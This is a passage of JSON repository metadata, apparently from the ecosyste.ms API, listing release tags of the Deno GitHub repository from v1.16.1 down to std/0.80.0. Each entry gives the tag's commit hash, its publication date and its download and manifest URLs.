2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH